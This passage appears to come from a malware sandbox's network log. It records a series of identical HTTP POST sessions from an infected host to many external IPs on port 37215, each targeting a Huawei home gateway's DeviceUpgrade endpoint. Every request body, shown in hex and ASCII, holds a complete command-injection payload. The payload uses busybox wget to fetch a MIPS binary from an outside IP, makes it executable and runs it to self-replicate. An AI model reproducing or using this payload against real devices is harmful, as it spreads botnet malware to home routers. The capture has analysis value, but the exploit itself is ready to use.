                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1033192.168.2.1337096157.100.160.25437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.499833107 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1034192.168.2.1341592157.11.163.10037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.499855995 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1035192.168.2.1341752197.245.90.2237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.499883890 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1036192.168.2.133636841.204.255.14037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.500152111 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1037192.168.2.133931841.69.153.15237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.500176907 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1038192.168.2.133613413.21.211.21437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.500289917 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1039192.168.2.135802819.212.165.23737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.500438929 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1040192.168.2.1350736157.227.29.16137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.500451088 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1041192.168.2.1333874217.240.53.2937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.500462055 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1042192.168.2.1333710157.210.138.23137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.500494003 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 